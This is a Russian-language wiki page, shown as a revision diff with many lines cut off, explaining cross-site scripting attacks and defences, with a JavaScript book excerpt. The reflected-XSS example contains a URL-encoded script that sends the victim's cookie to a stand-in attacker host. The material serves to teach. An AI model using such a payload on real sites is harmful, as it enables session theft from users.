Различия
Показаны различия между двумя версиями страницы.
— | cross-site_scripting [2025/07/06 12:38] (текущий) – создано - внешнее изменение 127.0.0.1 | ||
---|---|---|---|
Строка 1: | Строка 1: | ||
+ | ====== XSS - Cross-Site Scripting ====== | ||
+ | ~~Title: Уязвимость Cross-site Scripting (XSS) ~~ | ||
+ | {{htmlmetatags> | ||
+ | metatag-description=(XSS межсайтовый скриптинг или межсайтовое выполнение сценариев позволяет атакующему передать серверу исполняемый код, который будет перенаправлен браузеру пользователя.) | ||
+ | }} | ||
+ | |||
+ | * [[Классификатор угроз безопасности]] Интернет (Web- приложений) | ||
+ | |||
+ | **Cross-Site Scripting** или XSS. Межсайтовый скриптинг (межсайтовое выполнение сценариев). | ||
+ | |||
+ | Наличие уязвимости Cross-site Scripting позволяет атакующему передать серверу исполняемый код, который будет перенаправлен браузеру пользователя. Этот код обычно создается на языках HTML/ | ||
+ | |||
+ | Переданный код исполняется в контексте безопасности (или зоне безопасности) уязвимого сервера. Используя эти привилегии, | ||
+ | спланированной атаки злоумышленник может использовать браузер жертвы для просмотра страниц сайта от имени атакуемого пользователя. Код может передаваться злоумышленником в URL, в заголовках [[HTTP]] запроса ([[cookie]], | ||
+ | |||
+ | Существует три типа атак, приводящих к межсайтовому выполнению сценариев: | ||
+ | |||
+ | Осуществление непостоянной атаки требует, | ||
+ | |||
+ | Сохраненная разновидность уязвимости возникает, | ||
+ | Для атаки пользователю не обязательно переходить по ссылке, | ||
+ | * **Пример. Сохраненный (persistent) вариант атаки.** Многие сайты имеют доски объявлений и форумы, | ||
+ | сессии, | ||
+ | < | ||
+ | bin/ | ||
+ | </ | ||
+ | * **Пример. Отраженный (non-persistent) вариант атаки.** Многие серверы предоставляют пользователям возможность поиска по содержимому сервера. Как правило, | ||
+ | К примеру, | ||
+ | http:// | ||
+ | </ | ||
+ | http:// | ||
+ | username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65 | ||
+ | %6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70 | ||
+ | %3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65 | ||
+ | %78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F | ||
+ | %6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64 | ||
+ | %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73 | ||
+ | %63%72%69%70%74%3E | ||
+ | </ | ||
+ | * **Пример.DOM- based**. [[http:// | ||
+ | ====== Флэнаган Дэвид JavaScript ====== | ||
+ | // | ||
+ | |||
+ | Термин межсайтовый скриптинг | ||
+ | |||
+ | Веб страница считается уязвимой для XSS атак, если она динамически создает содержимое документа на основе пользовательских данных, | ||
+ | < | ||
+ | < | ||
+ | var name = decodeURIComponent(window.location.search.substring(6)) || ""; | ||
+ | document.write(" | ||
+ | </ | ||
+ | </ | ||
+ | Во второй строке сценария вызывается метод | ||
+ | < | ||
+ | http:// | ||
+ | </ | ||
+ | В этом случае будет выведен текст «Привет Давид». Но что произойдет, | ||
+ | < | ||
+ | http:// | ||
+ | </ | ||
+ | С таким содержимым URLадреса сценарий динамически сгенерирует другой сценарий (коды %3C и %3E – это угловые скобки)! В данном случае вставленный сценарий просто отобразит диалоговое | ||
+ | < | ||
+ | http:// | ||
+ | </ | ||
+ | Межсайтовый скриптинг потому так и называется, | ||
+ | |||
+ | Универсальный способ предотвращения XSSатак заключается в удалении HTML тегов из всех данных сомнительного происхождения, | ||
+ | < | ||
+ | name = name.replace(/</ | ||
+ | </ | ||
+ | Межсайтовый скриптинг представляет | ||
+ | ====== Ссылки ====== | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
📌 Удобный подбор VPS по параметрам доступен на DIEGfinder.com - официальном инструменте проекта DIEG. Это часть единой экосистемы, созданной для того, чтобы помочь быстро найти подходящий VPS/VDS сервер для любых задач хостинга.
📌 Для тестирования скриптов, установщиков VPN и Python-ботов рекомендуем использовать надежные VPS на короткий срок. Подробнее о быстрой аренде VPS для экспериментов - читайте здесь.
💥 Подпишись в Телеграм 💥 и задай вопрос по сайтам и хостингам бесплатно!7 Самых Популярных Статей
- Как запустить скрипты и веб-приложения на Python
- Что такое страны TIER 1,2,3
- 7 способов сравнения файлов по содержимому в Windows или Linux
- Установка и тестирование веб-панели HestiaCP
- Nginx простые примеры конфигурации
- top, htop, atop определение загрузки ОС (Load average, LA)
- Использование rsync в примерах
7 Самых Популярных Обзоров
- Хостинг для Python-скриптов и приложений
- ТОП 4 лучших антидетект браузеров (Бесплатные & Платные)
- Подборка купонов (промокоды) на хостинг, антидетект браузеры
- Обзор THE.Hosting (PQ Hosting): надежный хостинг с профессиональной поддержкой
- Хостинг в России
- Хостинг в Европе
- Обзор браузера Dolphin {anty} для мультиаккаунтинга